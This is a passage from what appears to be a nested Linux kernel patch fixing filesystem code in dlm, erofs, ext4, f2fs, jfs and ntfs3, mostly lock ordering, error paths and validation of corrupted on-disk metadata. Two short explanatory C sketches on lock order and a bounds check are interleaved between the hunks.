+ int dlm_new_user_lockspace(const char *name, const char *cluster,
+ 			   uint32_t flags, int lvblen,
+ 			   const struct dlm_lockspace_ops *ops,
+diff --git a/fs/dlm/midcomms.c b/fs/dlm/midcomms.c
+index b2a25a33a1488..71e426da48c3d 100644
+--- a/fs/dlm/midcomms.c
++++ b/fs/dlm/midcomms.c
+@@ -136,7 +136,6 @@
+ #include <net/tcp.h>
+ 
+ #include "dlm_internal.h"
+-#include "lockspace.h"
+ #include "lowcomms.h"
+ #include "config.h"
+ #include "memory.h"
+@@ -1458,8 +1457,6 @@ int dlm_midcomms_close(int nodeid)
+ 	if (nodeid == dlm_our_nodeid())
+ 		return 0;
+ 
+-	dlm_stop_lockspaces_check();
+-
+ 	idx = srcu_read_lock(&nodes_srcu);
+ 	/* Abort pending close/remove operation */
+ 	node = nodeid2node(nodeid, 0);
+diff --git a/fs/dlm/plock.c b/fs/dlm/plock.c
+index 737f185aad8dd..739e7d55c9e3d 100644
+--- a/fs/dlm/plock.c
++++ b/fs/dlm/plock.c
+@@ -29,8 +29,6 @@ struct plock_async_data {
+ struct plock_op {
+ 	struct list_head list;
+ 	int done;
+-	/* if lock op got interrupted while waiting dlm_controld reply */
+-	bool sigint;
+ 	struct dlm_plock_info info;
+ 	/* if set indicates async handling */
+ 	struct plock_async_data *data;
+@@ -156,23 +154,29 @@ int dlm_posix_lock(dlm_lockspace_t *lockspace, u64 number, struct file *file,
+ 
+ 	send_op(op);
+ 
+-	rv = wait_event_interruptible(recv_wq, (op->done != 0));
+-	if (rv == -ERESTARTSYS) {
+-		spin_lock(&ops_lock);
+-		/* recheck under ops_lock if we got a done != 0,
+-		 * if so this interrupt case should be ignored
+-		 */
+-		if (op->done != 0) {
++	if (op->info.wait) {
++		rv = wait_event_killable(recv_wq, (op->done != 0));
++		if (rv == -ERESTARTSYS) {
++			spin_lock(&ops_lock);
++			/* recheck under ops_lock if we got a done != 0,
++			 * if so this interrupt case should be ignored
++			 */
++			if (op->done != 0) {
++				spin_unlock(&ops_lock);
++				goto do_lock_wait;
++			}
++			list_del(&op->list);
+ 			spin_unlock(&ops_lock);
+-			goto do_lock_wait;
+-		}
+ 
+-		op->sigint = true;
+-		spin_unlock(&ops_lock);
+-		log_debug(ls, "%s: wait interrupted %x %llx pid %d",
+-			  __func__, ls->ls_global_id,
+-			  (unsigned long long)number, op->info.pid);
+-		goto out;
++			log_debug(ls, "%s: wait interrupted %x %llx pid %d",
++				  __func__, ls->ls_global_id,
++				  (unsigned long long)number, op->info.pid);
++			do_unlock_close(&op->info);
++			dlm_release_plock_op(op);
++			goto out;
++		}
++	} else {
++		wait_event(recv_wq, (op->done != 0));
+ 	}
+ 
+ do_lock_wait:
+@@ -359,7 +363,9 @@ int dlm_posix_get(dlm_lockspace_t *lockspace, u64 number, struct file *file,
+ 		locks_init_lock(fl);
+ 		fl->fl_type = (op->info.ex) ? F_WRLCK : F_RDLCK;
+ 		fl->fl_flags = FL_POSIX;
+-		fl->fl_pid = -op->info.pid;
++		fl->fl_pid = op->info.pid;
++		if (op->info.nodeid != dlm_our_nodeid())
++			fl->fl_pid = -fl->fl_pid;
+ 		fl->fl_start = op->info.start;
+ 		fl->fl_end = op->info.end;
+ 		rv = 0;
+@@ -388,7 +394,7 @@ static ssize_t dev_read(struct file *file, char __user *u, size_t count,
+ 		if (op->info.flags & DLM_PLOCK_FL_CLOSE)
+ 			list_del(&op->list);
+ 		else
+-			list_move(&op->list, &recv_list);
++			list_move_tail(&op->list, &recv_list);
+ 		memcpy(&info, &op->info, sizeof(info));
+ 	}
+ 	spin_unlock(&ops_lock);
+@@ -426,34 +432,53 @@ static ssize_t dev_write(struct file *file, const char __user *u, size_t count,
+ 	if (check_version(&info))
+ 		return -EINVAL;
+ 
++	/*
++	 * The results for waiting ops (SETLKW) can be returned in any
++	 * order, so match all fields to find the op.  The results for
++	 * non-waiting ops are returned in the order that they were sent
++	 * to userspace, so match the result with the first non-waiting op.
++	 */
+ 	spin_lock(&ops_lock);
+-	list_for_each_entry(iter, &recv_list, list) {
+-		if (iter->info.fsid == info.fsid &&
+-		    iter->info.number == info.number &&
+-		    iter->info.owner == info.owner) {
+-			if (iter->sigint) {
+-				list_del(&iter->list);
+-				spin_unlock(&ops_lock);
+-
+-				pr_debug("%s: sigint cleanup %x %llx pid %d",
+-					  __func__, iter->info.fsid,
+-					  (unsigned long long)iter->info.number,
+-					  iter->info.pid);
+-				do_unlock_close(&iter->info);
+-				memcpy(&iter->info, &info, sizeof(info));
+-				dlm_release_plock_op(iter);
+-				return count;
++	if (info.wait) {
++		list_for_each_entry(iter, &recv_list, list) {
++			if (iter->info.fsid == info.fsid &&
++			    iter->info.number == info.number &&
++			    iter->info.owner == info.owner &&
++			    iter->info.pid == info.pid &&
++			    iter->info.start == info.start &&
++			    iter->info.end == info.end &&
++			    iter->info.ex == info.ex &&
++			    iter->info.wait) {
++				op = iter;
++				break;
++			}
++		}
++	} else {
++		list_for_each_entry(iter, &recv_list, list) {
++			if (!iter->info.wait) {
++				op = iter;
++				break;
+ 			}
+-			list_del_init(&iter->list);
+-			memcpy(&iter->info, &info, sizeof(info));
+-			if (iter->data)
+-				do_callback = 1;
+-			else
+-				iter->done = 1;
+-			op = iter;
+-			break;
+ 		}
+ 	}
++
++	if (op) {
++		/* Sanity check that op and info match. */
++		if (info.wait)
++			WARN_ON(op->info.optype != DLM_PLOCK_OP_LOCK);
++		else
++			WARN_ON(op->info.fsid != info.fsid ||
++				op->info.number != info.number ||
++				op->info.owner != info.owner ||
++				op->info.optype != info.optype);
++
++		list_del_init(&op->list);
++		memcpy(&op->info, &info, sizeof(info));
++		if (op->data)
++			do_callback = 1;
++		else
++			op->done = 1;
++	}
+ 	spin_unlock(&ops_lock);
+ 
+ 	if (op) {
+@@ -462,8 +487,8 @@ static ssize_t dev_write(struct file *file, const char __user *u, size_t count,
+ 		else
+ 			wake_up(&recv_wq);
+ 	} else
+-		log_print("%s: no op %x %llx", __func__,
+-			  info.fsid, (unsigned long long)info.number);
++		pr_debug("%s: no op %x %llx", __func__,
++			 info.fsid, (unsigned long long)info.number);
+ 	return count;
+ }
+ 
+diff --git a/fs/erofs/inode.c b/fs/erofs/inode.c
+index 5aadc73d57652..e090bcd46db14 100644
+--- a/fs/erofs/inode.c
++++ b/fs/erofs/inode.c
+@@ -186,7 +186,8 @@ static void *erofs_read_inode(struct erofs_buf *buf,
+ 
+ 	inode->i_flags &= ~S_DAX;
+ 	if (test_opt(&sbi->opt, DAX_ALWAYS) && S_ISREG(inode->i_mode) &&
+-	    vi->datalayout == EROFS_INODE_FLAT_PLAIN)
++	    (vi->datalayout == EROFS_INODE_FLAT_PLAIN ||
++	     vi->datalayout == EROFS_INODE_CHUNK_BASED))
+ 		inode->i_flags |= S_DAX;
+ 	if (!nblks)
+ 		/* measure inode.i_blocks as generic filesystems */
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 92b2e4ddb7ce9..533e612b6a486 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -866,7 +866,7 @@ hitted:
+ 	 */
+ 	tight &= (fe->mode > Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE);
+ 
+-	cur = end - min_t(unsigned int, offset + end - map->m_la, end);
++	cur = end - min_t(erofs_off_t, offset + end - map->m_la, end);
+ 	if (!(map->m_flags & EROFS_MAP_MAPPED)) {
+ 		zero_user_segment(page, cur, end);
+ 		goto next_part;
+@@ -1660,7 +1660,7 @@ static void z_erofs_pcluster_readmore(struct z_erofs_decompress_frontend *f,
+ 	}
+ 
+ 	cur = map->m_la + map->m_llen - 1;
+-	while (cur >= end) {
++	while ((cur >= end) && (cur < i_size_read(inode))) {
+ 		pgoff_t index = cur >> PAGE_SHIFT;
+ 		struct page *page;
+ 
+diff --git a/fs/ext2/inode.c b/fs/ext2/inode.c
+index 918ab2f9e4c05..5a32fcd55183b 100644
+--- a/fs/ext2/inode.c
++++ b/fs/ext2/inode.c
+@@ -1265,9 +1265,8 @@ static int ext2_setsize(struct inode *inode, loff_t newsize)
+ 	inode_dio_wait(inode);
+ 
+ 	if (IS_DAX(inode))
+-		error = dax_zero_range(inode, newsize,
+-				       PAGE_ALIGN(newsize) - newsize, NULL,
+-				       &ext2_iomap_ops);
++		error = dax_truncate_page(inode, newsize, NULL,
++					  &ext2_iomap_ops);
+ 	else
+ 		error = block_truncate_page(inode->i_mapping,
+ 				newsize, ext2_get_block);
+diff --git a/fs/ext4/indirect.c b/fs/ext4/indirect.c
+index c68bebe7ff4b6..a9f3716119d37 100644
+--- a/fs/ext4/indirect.c
++++ b/fs/ext4/indirect.c
+@@ -651,6 +651,14 @@ int ext4_ind_map_blocks(handle_t *handle, struct inode *inode,
+ 
+ 	ext4_update_inode_fsync_trans(handle, inode, 1);
+ 	count = ar.len;
++
++	/*
++	 * Update reserved blocks/metadata blocks after successful block
++	 * allocation which had been deferred till now.
++	 */
++	if (flags & EXT4_GET_BLOCKS_DELALLOC_RESERVE)
++		ext4_da_update_reserve_space(inode, count, 1);
++
+ got_it:
+ 	map->m_flags |= EXT4_MAP_MAPPED;
+ 	map->m_pblk = le32_to_cpu(chain[depth-1].key);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 80d5a859ab148..5aa3003cfc688 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -660,16 +660,6 @@ found:
+ 			 */
+ 			ext4_clear_inode_state(inode, EXT4_STATE_EXT_MIGRATE);
+ 		}
+-
+-		/*
+-		 * Update reserved blocks/metadata blocks after successful
+-		 * block allocation which had been deferred till now. We don't
+-		 * support fallocate for non extent files. So we can update
+-		 * reserve space here.
+-		 */
+-		if ((retval > 0) &&
+-			(flags & EXT4_GET_BLOCKS_DELALLOC_RESERVE))
+-			ext4_da_update_reserve_space(inode, retval, 1);
+ 	}
+ 
+ 	if (retval > 0) {
+diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
+index 8c2b1ff5e6959..3784f70416492 100644
+--- a/fs/ext4/ioctl.c
++++ b/fs/ext4/ioctl.c
+@@ -800,6 +800,7 @@ static int ext4_shutdown(struct super_block *sb, unsigned long arg)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	__u32 flags;
++	int ret;
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+@@ -818,7 +819,9 @@ static int ext4_shutdown(struct super_block *sb, unsigned long arg)
+ 
+ 	switch (flags) {
+ 	case EXT4_GOING_FLAGS_DEFAULT:
+-		freeze_bdev(sb->s_bdev);
++		ret = freeze_bdev(sb->s_bdev);
++		if (ret)
++			return ret;
+ 		set_bit(EXT4_FLAGS_SHUTDOWN, &sbi->s_ext4_flags);
+ 		thaw_bdev(sb->s_bdev);
+ 		break;
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 32d88757a780e..88ed64ebae3e7 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -6073,8 +6073,8 @@ do_more:
+ 		 * them with group lock_held
+ 		 */
+ 		if (test_opt(sb, DISCARD)) {
+-			err = ext4_issue_discard(sb, block_group, bit, count,
+-						 NULL);
++			err = ext4_issue_discard(sb, block_group, bit,
++						 count_clusters, NULL);
+ 			if (err && err != -EOPNOTSUPP)
+ 				ext4_msg(sb, KERN_WARNING, "discard request in"
+ 					 " group:%u block:%d count:%lu failed"
+@@ -6158,12 +6158,6 @@ void ext4_free_blocks(handle_t *handle, struct inode *inode,
+ 
+ 	sbi = EXT4_SB(sb);
+ 
+-	if (sbi->s_mount_state & EXT4_FC_REPLAY) {
+-		ext4_free_blocks_simple(inode, block, count);
+-		return;
+-	}
+-
+-	might_sleep();
+ 	if (bh) {
+ 		if (block)
+ 			BUG_ON(block != bh->b_blocknr);
+@@ -6171,6 +6165,13 @@ void ext4_free_blocks(handle_t *handle, struct inode *inode,
+ 			block = bh->b_blocknr;
+ 	}
+ 
++	if (sbi->s_mount_state & EXT4_FC_REPLAY) {
++		ext4_free_blocks_simple(inode, block, EXT4_NUM_B2C(sbi, count));
++		return;
++	}
++
++	might_sleep();
++
+ 	if (!(flags & EXT4_FREE_BLOCKS_VALIDATED) &&
+ 	    !ext4_inode_block_valid(inode, block, count)) {
+ 		ext4_error(sb, "Freeing blocks not in datazone - "
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 760249d9152d1..601e097e17207 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -1129,6 +1129,12 @@ static void ext4_blkdev_remove(struct ext4_sb_info *sbi)
+ 	struct block_device *bdev;
+ 	bdev = sbi->s_journal_bdev;
+ 	if (bdev) {
++		/*
++		 * Invalidate the journal device's buffers.  We don't want them
++		 * floating about in memory - the physical journal device may
++		 * be hotswapped, and it breaks the `ro-after' testing code.
++		 */
++		invalidate_bdev(bdev);
+ 		ext4_blkdev_put(bdev);
+ 		sbi->s_journal_bdev = NULL;
+ 	}
+@@ -1274,13 +1280,7 @@ static void ext4_put_super(struct super_block *sb)
+ 	sync_blockdev(sb->s_bdev);
+ 	invalidate_bdev(sb->s_bdev);
+ 	if (sbi->s_journal_bdev && sbi->s_journal_bdev != sb->s_bdev) {
+-		/*
+-		 * Invalidate the journal device's buffers.  We don't want them
+-		 * floating about in memory - the physical journal device may
+-		 * hotswapped, and it breaks the `ro-after' testing code.
+-		 */
+ 		sync_blockdev(sbi->s_journal_bdev);
+-		invalidate_bdev(sbi->s_journal_bdev);
+ 		ext4_blkdev_remove(sbi);
+ 	}
+ 
+@@ -5544,7 +5544,7 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 		ext4_msg(sb, KERN_INFO, "recovery complete");
+ 		err = ext4_mark_recovery_complete(sb, es);
+ 		if (err)
+-			goto failed_mount9;
++			goto failed_mount10;
+ 	}
+ 
+ 	if (test_opt(sb, DISCARD) && !bdev_max_discard_sectors(sb->s_bdev))
+@@ -5563,7 +5563,9 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 
+ 	return 0;
+ 
+-failed_mount9:
++failed_mount10:
++	ext4_quota_off_umount(sb);
++failed_mount9: __maybe_unused
+ 	ext4_release_orphan_info(sb);
+ failed_mount8:
+ 	ext4_unregister_sysfs(sb);
+@@ -5634,6 +5636,7 @@ failed_mount:
+ 	brelse(sbi->s_sbh);
+ 	ext4_blkdev_remove(sbi);
+ out_fail:
++	invalidate_bdev(sb->s_bdev);
+ 	sb->s_fs_info = NULL;
+ 	return err ? err : ret;
+ }
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index e50d5848c1001..fb75ff7b3448d 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -764,7 +764,7 @@ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task)
+ 		ret = -EFSCORRUPTED;
+ 
+ 		/* Avoid f2fs_commit_super in irq context */
+-		if (in_task)
++		if (!in_task)
+ 			f2fs_save_errors(sbi, ERROR_FAIL_DECOMPRESSION);
+ 		else
+ 			f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
+diff --git a/fs/f2fs/dir.c b/fs/f2fs/dir.c
+index 21960a899b6ad..bf5ba75b75d24 100644
+--- a/fs/f2fs/dir.c
++++ b/fs/f2fs/dir.c
+@@ -806,8 +806,15 @@ int f2fs_add_dentry(struct inode *dir, const struct f2fs_filename *fname,
+ {
+ 	int err = -EAGAIN;
+ 
+-	if (f2fs_has_inline_dentry(dir))
++	if (f2fs_has_inline_dentry(dir)) {
++		/*
++		 * Should get i_xattr_sem to keep the lock order:
++		 * i_xattr_sem -> inode_page lock used by f2fs_setxattr.
++		 */
++		f2fs_down_read(&F2FS_I(dir)->i_xattr_sem);
+ 		err = f2fs_add_inline_entry(dir, fname, inode, ino, mode);
++		f2fs_up_read(&F2FS_I(dir)->i_xattr_sem);
++	}
+ 	if (err == -EAGAIN)
+ 		err = f2fs_add_regular_entry(dir, fname, inode, ino, mode);
+ 
+diff --git a/fs/f2fs/xattr.c b/fs/f2fs/xattr.c
+index dc2e8637189e2..db3b641f2158c 100644
+--- a/fs/f2fs/xattr.c
++++ b/fs/f2fs/xattr.c
+@@ -527,10 +527,12 @@ int f2fs_getxattr(struct inode *inode, int index, const char *name,
+ 	if (len > F2FS_NAME_LEN)
+ 		return -ERANGE;
+ 
+-	f2fs_down_read(&F2FS_I(inode)->i_xattr_sem);
++	if (!ipage)
++		f2fs_down_read(&F2FS_I(inode)->i_xattr_sem);
+ 	error = lookup_all_xattrs(inode, ipage, index, len, name,
+ 				&entry, &base_addr, &base_size, &is_inline);
+-	f2fs_up_read(&F2FS_I(inode)->i_xattr_sem);
++	if (!ipage)
++		f2fs_up_read(&F2FS_I(inode)->i_xattr_sem);
+ 	if (error)
+ 		return error;
+ 
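
The two f2fs hunks above pin down a single lock order - i_xattr_sem ("A") is always taken before the inode page lock ("B") - and skip re-acquiring the semaphore when the caller already holds the page (non-NULL ipage). A minimal pthread sketch of the same discipline, with illustrative names rather than f2fs API:

#include <pthread.h>

static pthread_rwlock_t xattr_sem = PTHREAD_RWLOCK_INITIALIZER;  /* "A" */
static pthread_mutex_t page_lock = PTHREAD_MUTEX_INITIALIZER;    /* "B" */

/* Writers take A before B, matching i_xattr_sem -> inode_page lock. */
static void add_inline_entry(void)
{
	pthread_rwlock_rdlock(&xattr_sem);
	pthread_mutex_lock(&page_lock);
	/* ... update the inline dentry block ... */
	pthread_mutex_unlock(&page_lock);
	pthread_rwlock_unlock(&xattr_sem);
}

/* A caller that already holds B says so (like passing a non-NULL
 * ipage), so the callee never takes A after B and inverts the order. */
static void get_xattr(int caller_holds_page)
{
	if (!caller_holds_page)
		pthread_rwlock_rdlock(&xattr_sem);
	/* ... look up the xattr ... */
	if (!caller_holds_page)
		pthread_rwlock_unlock(&xattr_sem);
}
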
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index a3eb1e8269477..da6a2bc6bf022 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -178,7 +178,13 @@ int dbMount(struct inode *ipbmap)
+ 	dbmp_le = (struct dbmap_disk *) mp->data;
+ 	bmp->db_mapsize = le64_to_cpu(dbmp_le->dn_mapsize);
+ 	bmp->db_nfree = le64_to_cpu(dbmp_le->dn_nfree);
++
+ 	bmp->db_l2nbperpage = le32_to_cpu(dbmp_le->dn_l2nbperpage);
++	if (bmp->db_l2nbperpage > L2PSIZE - L2MINBLOCKSIZE) {
++		err = -EINVAL;
++		goto err_release_metapage;
++	}
++
+ 	bmp->db_numag = le32_to_cpu(dbmp_le->dn_numag);
+ 	if (!bmp->db_numag) {
+ 		err = -EINVAL;
+diff --git a/fs/jfs/jfs_filsys.h b/fs/jfs/jfs_filsys.h
+index b5d702df7111a..33ef13a0b1108 100644
+--- a/fs/jfs/jfs_filsys.h
++++ b/fs/jfs/jfs_filsys.h
+@@ -122,7 +122,9 @@
+ #define NUM_INODE_PER_IAG	INOSPERIAG
+ 
+ #define MINBLOCKSIZE		512
++#define L2MINBLOCKSIZE		9
+ #define MAXBLOCKSIZE		4096
++#define L2MAXBLOCKSIZE		12
+ #define	MAXFILESIZE		((s64)1 << 52)
+ 
+ #define JFS_LINK_MAX		0xffffffff
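
For context on the dbMount() bound added above: a dmap page is PSIZE (4096, L2PSIZE = 12) bytes and a block is at least MINBLOCKSIZE (512, L2MINBLOCKSIZE = 9) bytes, so a log2(blocks per page) read from disk can never legitimately exceed 12 - 9 = 3. A stand-alone sketch of that sanity check:

#include <stdbool.h>

#define L2PSIZE		12	/* log2 of the 4096-byte dmap page */
#define L2MINBLOCKSIZE	9	/* log2 of the 512-byte minimum block */

/* Reject out-of-range values that a corrupted image could carry. */
static bool l2nbperpage_valid(unsigned int l2nbperpage)
{
	return l2nbperpage <= L2PSIZE - L2MINBLOCKSIZE;	/* i.e. <= 3 */
}
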
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 98491abf95b9d..9e9a9ffd92958 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -605,11 +605,58 @@ static const struct NTFS_DE *hdr_insert_head(struct INDEX_HDR *hdr,
+ 	return e;
+ }
+ 
++/*
++ * index_hdr_check
++ *
++ * return true if INDEX_HDR is valid
++ */
++static bool index_hdr_check(const struct INDEX_HDR *hdr, u32 bytes)
++{
++	u32 end = le32_to_cpu(hdr->used);
++	u32 tot = le32_to_cpu(hdr->total);
++	u32 off = le32_to_cpu(hdr->de_off);
++
++	if (!IS_ALIGNED(off, 8) || tot > bytes || end > tot ||
++	    off + sizeof(struct NTFS_DE) > end) {
++		/* incorrect index buffer. */
++		return false;
++	}
++
++	return true;
++}
++
++/*
++ * index_buf_check
++ *
++ * return true if INDEX_BUFFER seems to be valid
++ */
++static bool index_buf_check(const struct INDEX_BUFFER *ib, u32 bytes,
++			    const CLST *vbn)
++{
++	const struct NTFS_RECORD_HEADER *rhdr = &ib->rhdr;
++	u16 fo = le16_to_cpu(rhdr->fix_off);
++	u16 fn = le16_to_cpu(rhdr->fix_num);
++
++	if (bytes <= offsetof(struct INDEX_BUFFER, ihdr) ||
++	    rhdr->sign != NTFS_INDX_SIGNATURE ||
++	    fo < sizeof(struct INDEX_BUFFER)
++	    /* Check index buffer vbn. */
++	    || (vbn && *vbn != le64_to_cpu(ib->vbn)) || (fo % sizeof(short)) ||
++	    fo + fn * sizeof(short) >= bytes ||
++	    fn != ((bytes >> SECTOR_SHIFT) + 1)) {
++		/* incorrect index buffer. */
++		return false;
++	}
++
++	return index_hdr_check(&ib->ihdr,
++			       bytes - offsetof(struct INDEX_BUFFER, ihdr));
++}
++
+ void fnd_clear(struct ntfs_fnd *fnd)
+ {
+ 	int i;
+ 
+-	for (i = 0; i < fnd->level; i++) {
++	for (i = fnd->level - 1; i >= 0; i--) {
+ 		struct indx_node *n = fnd->nodes[i];
+ 
+ 		if (!n)
+@@ -828,9 +875,16 @@ int indx_init(struct ntfs_index *indx, struct ntfs_sb_info *sbi,
+ 	u32 t32;
+ 	const struct INDEX_ROOT *root = resident_data(attr);
+ 
++	t32 = le32_to_cpu(attr->res.data_size);
++	if (t32 <= offsetof(struct INDEX_ROOT, ihdr) ||
++	    !index_hdr_check(&root->ihdr,
++			     t32 - offsetof(struct INDEX_ROOT, ihdr))) {
++		goto out;
++	}
++
+ 	/* Check root fields. */
+ 	if (!root->index_block_clst)
+-		return -EINVAL;
++		goto out;
+ 
+ 	indx->type = type;
+ 	indx->idx2vbn_bits = __ffs(root->index_block_clst);
+@@ -842,19 +896,19 @@ int indx_init(struct ntfs_index *indx, struct ntfs_sb_info *sbi,
+ 	if (t32 < sbi->cluster_size) {
+ 		/* Index record is smaller than a cluster, use 512 blocks. */
+ 		if (t32 != root->index_block_clst * SECTOR_SIZE)
+-			return -EINVAL;
++			goto out;
+ 
+ 		/* Check alignment to a cluster. */
+ 		if ((sbi->cluster_size >> SECTOR_SHIFT) &
+ 		    (root->index_block_clst - 1)) {
+-			return -EINVAL;
++			goto out;
+ 		}
+ 
+ 		indx->vbn2vbo_bits = SECTOR_SHIFT;
+ 	} else {
+ 		/* Index record must be a multiple of cluster size. */
+ 		if (t32 != root->index_block_clst << sbi->cluster_bits)
+-			return -EINVAL;
++			goto out;
+ 
+ 		indx->vbn2vbo_bits = sbi->cluster_bits;
+ 	}
+@@ -862,7 +916,14 @@ int indx_init(struct ntfs_index *indx, struct ntfs_sb_info *sbi,
+ 	init_rwsem(&indx->run_lock);
+ 
+ 	indx->cmp = get_cmp_func(root);
+-	return indx->cmp ? 0 : -EINVAL;
++	if (!indx->cmp)
++		goto out;
++
++	return 0;
++
++out:
++	ntfs_set_state(sbi, NTFS_DIRTY_DIRTY);
++	return -EINVAL;
+ }
+ 
+ static struct indx_node *indx_new(struct ntfs_index *indx,
+@@ -1020,6 +1081,13 @@ int indx_read(struct ntfs_index *indx, struct ntfs_inode *ni, CLST vbn,
+ 		goto out;
+ 
+ ok:
++	if (!index_buf_check(ib, bytes, &vbn)) {
++		ntfs_inode_err(&ni->vfs_inode, "directory corrupted");
++		ntfs_set_state(ni->mi.sbi, NTFS_DIRTY_ERROR);
++		err = -EINVAL;
++		goto out;
++	}
++
+ 	if (err == -E_NTFS_FIXUP) {
+ 		ntfs_write_bh(ni->mi.sbi, &ib->rhdr, &in->nb, 0);
+ 		err = 0;
+@@ -1607,9 +1675,9 @@ static int indx_insert_into_root(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 
+ 	if (err) {
+ 		/* Restore root. */
+-		if (mi_resize_attr(mi, attr, -ds_root))
++		if (mi_resize_attr(mi, attr, -ds_root)) {
+ 			memcpy(attr, a_root, asize);
+-		else {
++		} else {
+ 			/* Bug? */
+ 			ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
+ 		}
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index e52dfa5c7562c..dc937089a464a 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -81,7 +81,7 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 			 le16_to_cpu(ref->seq), le16_to_cpu(rec->seq));
+ 		goto out;
+ 	} else if (!is_rec_inuse(rec)) {
+-		err = -EINVAL;
++		err = -ESTALE;
+ 		ntfs_err(sb, "Inode r=%x is not in use!", (u32)ino);
+ 		goto out;
+ 	}
+@@ -92,8 +92,10 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 		goto out;
+ 	}
+ 
+-	if (!is_rec_base(rec))
+-		goto Ok;
++	if (!is_rec_base(rec)) {
++		err = -EINVAL;
++		goto out;
++	}
+ 
+ 	/* Record should contain $I30 root. */
+ 	is_dir = rec->flags & RECORD_FLAG_DIR;
+@@ -472,7 +474,6 @@ end_enum:
+ 		inode->i_flags |= S_NOSEC;
+ 	}
+ 
+-Ok:
+ 	if (ino == MFT_REC_MFT && !sb->s_root)
+ 		sbi->mft.ni = NULL;
+ 
+@@ -526,6 +527,9 @@ struct inode *ntfs_iget5(struct super_block *sb, const struct MFT_REF *ref,
+ 		_ntfs_bad_inode(inode);
+ 	}
+ 
++	if (IS_ERR(inode) && name)
++		ntfs_set_state(sb->s_fs_info, NTFS_DIRTY_ERROR);
++
+ 	return inode;
+ }
+ 
+@@ -1641,10 +1645,8 @@ out6:
+ 		ntfs_remove_reparse(sbi, IO_REPARSE_TAG_SYMLINK, &new_de->ref);
+ 
+ out5:
+-	if (S_ISDIR(mode) || run_is_empty(&ni->file.run))
+-		goto out4;
+-
+-	run_deallocate(sbi, &ni->file.run, false);
++	if (!S_ISDIR(mode))
++		run_deallocate(sbi, &ni->file.run, false);
+ 
+ out4:
+ 	clear_rec_inuse(rec);
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index c5c022fef4e0b..24227b2e1b2b0 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -794,12 +794,12 @@ int run_pack(const struct runs_tree *run, CLST svcn, CLST len, u8 *run_buf,
+ 	     u32 run_buf_size, CLST *packed_vcns);
+ int run_unpack(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+ 	       CLST svcn, CLST evcn, CLST vcn, const u8 *run_buf,
+-	       u32 run_buf_size);
++	       int run_buf_size);
+ 
+ #ifdef NTFS3_CHECK_FREE_CLST
+ int run_unpack_ex(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+ 		  CLST svcn, CLST evcn, CLST vcn, const u8 *run_buf,
+-		  u32 run_buf_size);
++		  int run_buf_size);
+ #else
+ #define run_unpack_ex run_unpack
+ #endif
+diff --git a/fs/ntfs3/run.c b/fs/ntfs3/run.c
+index aaaa0d3d35a24..12d8682f33b53 100644
+--- a/fs/ntfs3/run.c
++++ b/fs/ntfs3/run.c
+@@ -919,12 +919,15 @@ out:
+  */
+ int run_unpack(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+ 	       CLST svcn, CLST evcn, CLST vcn, const u8 *run_buf,
+-	       u32 run_buf_size)
++	       int run_buf_size)
+ {
+ 	u64 prev_lcn, vcn64, lcn, next_vcn;
+ 	const u8 *run_last, *run_0;
+ 	bool is_mft = ino == MFT_REC_MFT;
+ 
++	if (run_buf_size < 0)
++		return -EINVAL;
++
+ 	/* Check for empty. */
+ 	if (evcn + 1 == svcn)
+ 		return 0;
+@@ -1046,7 +1049,7 @@ int run_unpack(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+  */
+ int run_unpack_ex(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+ 		  CLST svcn, CLST evcn, CLST vcn, const u8 *run_buf,
+-		  u32 run_buf_size)
++		  int run_buf_size)
+ {
+ 	int ret, err;
+ 	CLST next_vcn, lcn, len;
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index 88866bcd1a218..f5d3092f478c5 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -42,28 +42,26 @@ static inline size_t packed_ea_size(const struct EA_FULL *ea)
+  * Assume there is at least one xattr in the list.
+  */
+ static inline bool find_ea(const struct EA_FULL *ea_all, u32 bytes,
+-			   const char *name, u8 name_len, u32 *off)
++			   const char *name, u8 name_len, u32 *off, u32 *ea_sz)
+ {
+-	*off = 0;
++	u32 ea_size;
+ 
+-	if (!ea_all || !bytes)
++	*off = 0;
++	if (!ea_all)
+ 		return false;
+ 
+-	for (;;) {
